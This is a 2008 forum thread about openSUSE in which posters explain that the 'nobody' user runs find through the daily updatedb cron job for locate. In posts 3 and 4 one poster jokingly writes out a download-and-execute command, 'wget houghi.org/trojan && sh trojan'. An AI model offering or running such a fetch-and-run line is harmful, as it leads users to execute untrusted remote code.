Unknown user - Suse

This is a discussion on Unknown user - Suse ; Why does a user called nobody keep running the find command on my system? I now kill this operation. How to keep it from running? -- Blattus Slafaly ? 3 7/8...

+ Reply to Thread
Results 1 to 9 of 9

Thread: Unknown user

  1. Unknown user

    Why does a user called nobody keep running the find command on my
    system? I now kill this operation. How to keep it from running?


    --
    Blattus Slafaly ? 3 7/8

  2. Re: Unknown user

    Blattus Slafaly wrote:

    > Why does a user called nobody keep running the find command on my
    > system? I now kill this operation. How to keep it from running?


    It's to keep the database used by locate(1) up-to-date; see:

    /etc/cron.daily/suse.de-updatedb

    It's run as nobody so that it can only list publically accessible files.

    --
    Huibert
    "Hey! HEY! Curious cat, here!" -- Krosp I (GG)

  3. Re: Unknown user

    Huibert Bol wrote:
    > It's to keep the database used by locate(1) up-to-date; see:
    >
    > /etc/cron.daily/suse.de-updatedb
    >
    > It's run as nobody so that it can only list publically accessible files.


    What is even more worrying is that it is running and he does not know
    why. licate is not installed by default, so you have to select it
    manually. So this means that it was selected without even knowing why.

    Mmm. Run `wget houghi.org/trojan && sh trojan` Must turn that into a
    on-click-install and make gazillions.

    houghi
    --
    It's people. Source code is made out of people! They're making our
    source out of people. Next thing they'll be breeding us like cattle
    for code. You've gotta tell them. You've gotta tell them!

  4. Re: Unknown user

    houghi wrote:
    > Huibert Bol wrote:
    >> It's to keep the database used by locate(1) up-to-date; see:
    >>
    >> /etc/cron.daily/suse.de-updatedb
    >>
    >> It's run as nobody so that it can only list publically accessible files.

    >
    > What is even more worrying is that it is running and he does not know
    > why. licate is not installed by default, so you have to select it
    > manually. So this means that it was selected without even knowing why.
    >
    > Mmm. Run `wget houghi.org/trojan && sh trojan` Must turn that into a
    > on-click-install and make gazillions.
    >
    > houghi


    I know I installed Locate and the command to update the database is
    'updatedb' not find.

    --
    Blattus Slafaly ? 3 7/8

  5. Re: Unknown user

    Blattus Slafaly wrote:
    > I know I installed Locate and the command to update the database is
    > 'updatedb' not find.


    updatedb is just a script.

    houghi
    --
    It's people. Source code is made out of people! They're making our
    source out of people. Next thing they'll be breeding us like cattle
    for code. You've gotta tell them. You've gotta tell them!

  6. Re: Unknown user

    On Fri, 3 Oct 2008, Blattus Slafaly wrote:-



    >I know I installed Locate and the command to update the database is
    >'updatedb' not find.


    But updatedb is a script that uses find and, as such, when updatedb runs
    as user nobody, so do all the sub-processes started by that script.

    davjam@adder:~> which updatedb
    /usr/bin/updatedb
    davjam@adder:~> file $(which updatedb)
    /usr/bin/updatedb: Bourne shell script text
    davjam@adder:~> grep -n "find" $(which updatedb)
    24:Usage: $0 [--findoptions='-option1 -option2...']
    30:Report bugs to ."
    42: --findoptions) FINDOPTIONS="$val" ;;
    61: echo "Warning: future versions of findutils will shortly discontinue support for the old locate database format." >&2
    107:# Any global options for find?
    132:# The same, in the form of a regex that find can use.
    156: : ${LIBEXECDIR=/usr/lib64/find}
    159:# The directory containing find.
    167:: ${find:=${BINDIR}/find}
    198: "$find $SEARCHPATHS $FINDOPTIONS \
    203: $find $SEARCHPATHS $FINDOPTIONS \
    214: "$find $NETPATHS $FINDOPTIONS \\( -type d -regex '$PRUNEREGEX' -prune \\) -o $print_option" ||
    218: $find $NETPATHS $FINDOPTIONS \( -type d -regex "$PRUNEREGEX" -prune \) -o $print_option ||
    268: "$find $SEARCHPATHS $FINDOPTIONS \
    273: $find $SEARCHPATHS $FINDOPTIONS \
    284: "$find $NETPATHS $FINDOPTIONS \\( -type d -regex '$PRUNEREGEX' -prune \\) -o $print_option" ||
    288: $find $NETPATHS $FINDOPTIONS \( -type d -regex "$PRUNEREGEX" -prune \) -o $print_option ||

    And updatedb is called daily by script /etc/cron.daily/suse.de-updatedb,
    which reads some settings from /etc/sysconfig/locate, which in turn is
    where you'll find:

    ## Type: string(nobody,root)
    ## Default: nobody
    #
    # updatedb has a parameter "--localuser".
    # It runs the "find" command as this user. Some people think this is a
    # security hole if set to 'root' (because some directory information can
    # be read which is normally protected). Others think it is useful to hold
    # all files in the database.
    # So if you want full information in locate db, set RUN_UPDATEDB_AS=root.
    # If you want security use RUN_UPDATEDB_AS=nobody.
    #
    RUN_UPDATEDB_AS=nobody


    Regards,
    David Bolt

    --
    www.davjam.org/lifetype/ www.distributed.net: OGR@100Mnodes, RC5-72@15Mkeys
    SUSE 10.1 32b | | openSUSE 10.3 32b | openSUSE 11.0 32b
    | openSUSE 10.2 64b | openSUSE 10.3 64b | openSUSE 11.0 64b
    RISC OS 3.6 | TOS 4.02 | openSUSE 10.3 PPC | RISC OS 3.11

  7. Re: Unknown user

    David Bolt wrote:
    > davjam@adder:~> which updatedb
    > /usr/bin/updatedb
    > davjam@adder:~> file $(which updatedb)
    > /usr/bin/updatedb: Bourne shell script text


    I would skip the first step if you intend to do the second step.

    houghi
    --
    Quote correct (NL) http://www.briachons.org/art/quote/
    Zitiere richtig (DE) http://www.afaik.de/usenet/faq/zitieren
    Quote correctly (EN) http://www.netmeister.org/news/learn2quote.html

  8. Re: Unknown user

    David Bolt wrote:
    > On Fri, 3 Oct 2008, Blattus Slafaly wrote:-
    >
    >
    >
    >> I know I installed Locate and the command to update the database is
    >> 'updatedb' not find.

    >
    > But updatedb is a script that uses find and, as such, when updatedb runs
    > as user nobody, so do all the sub-processes started by that script.
    >
    > davjam@adder:~> which updatedb
    > /usr/bin/updatedb
    > davjam@adder:~> file $(which updatedb)
    > /usr/bin/updatedb: Bourne shell script text
    > davjam@adder:~> grep -n "find" $(which updatedb)
    > 24:Usage: $0 [--findoptions='-option1 -option2...']
    > 30:Report bugs to ."
    > 42: --findoptions) FINDOPTIONS="$val" ;;
    > 61: echo "Warning: future versions of findutils will shortly discontinue support for the old locate database format." >&2
    > 107:# Any global options for find?
    > 132:# The same, in the form of a regex that find can use.
    > 156: : ${LIBEXECDIR=/usr/lib64/find}
    > 159:# The directory containing find.
    > 167:: ${find:=${BINDIR}/find}
    > 198: "$find $SEARCHPATHS $FINDOPTIONS \
    > 203: $find $SEARCHPATHS $FINDOPTIONS \
    > 214: "$find $NETPATHS $FINDOPTIONS \\( -type d -regex '$PRUNEREGEX' -prune \\) -o $print_option" ||
    > 218: $find $NETPATHS $FINDOPTIONS \( -type d -regex "$PRUNEREGEX" -prune \) -o $print_option ||
    > 268: "$find $SEARCHPATHS $FINDOPTIONS \
    > 273: $find $SEARCHPATHS $FINDOPTIONS \
    > 284: "$find $NETPATHS $FINDOPTIONS \\( -type d -regex '$PRUNEREGEX' -prune \\) -o $print_option" ||
    > 288: $find $NETPATHS $FINDOPTIONS \( -type d -regex "$PRUNEREGEX" -prune \) -o $print_option ||
    >
    > And updatedb is called daily by script /etc/cron.daily/suse.de-updatedb,
    > which reads some settings from /etc/sysconfig/locate, which in turn is
    > where you'll find:
    >
    > ## Type: string(nobody,root)
    > ## Default: nobody
    > #
    > # updatedb has a parameter "--localuser".
    > # It runs the "find" command as this user. Some people think this is a
    > # security hole if set to 'root' (because some directory information can
    > # be read which is normally protected). Others think it is useful to hold
    > # all files in the database.
    > # So if you want full information in locate db, set RUN_UPDATEDB_AS=root.
    > # If you want security use RUN_UPDATEDB_AS=nobody.
    > #
    > RUN_UPDATEDB_AS=nobody
    >
    >
    > Regards,
    > David Bolt
    >


    I used to have to run updatedb manually. Why is it now automatic?

    --
    Blattus Slafaly ? 3 7/8

  9. Re: Unknown user

    On Fri, 3 Oct 2008, Blattus Slafaly wrote:-



    >I used to have to run updatedb manually. Why is it now automatic?


    I don't know why you'd have had to run it manually since there has been
    a (suse.de-)updatedb script in cron.daily since at least SuSE 8.1.


    Regards,
    David Bolt

    --
    www.davjam.org/lifetype/ www.distributed.net: OGR@100Mnodes, RC5-72@15Mkeys
    SUSE 10.1 32b | | openSUSE 10.3 32b | openSUSE 11.0 32b
    | openSUSE 10.2 64b | openSUSE 10.3 64b | openSUSE 11.0 64b
    RISC OS 3.6 | TOS 4.02 | openSUSE 10.3 PPC | RISC OS 3.11

+ Reply to Thread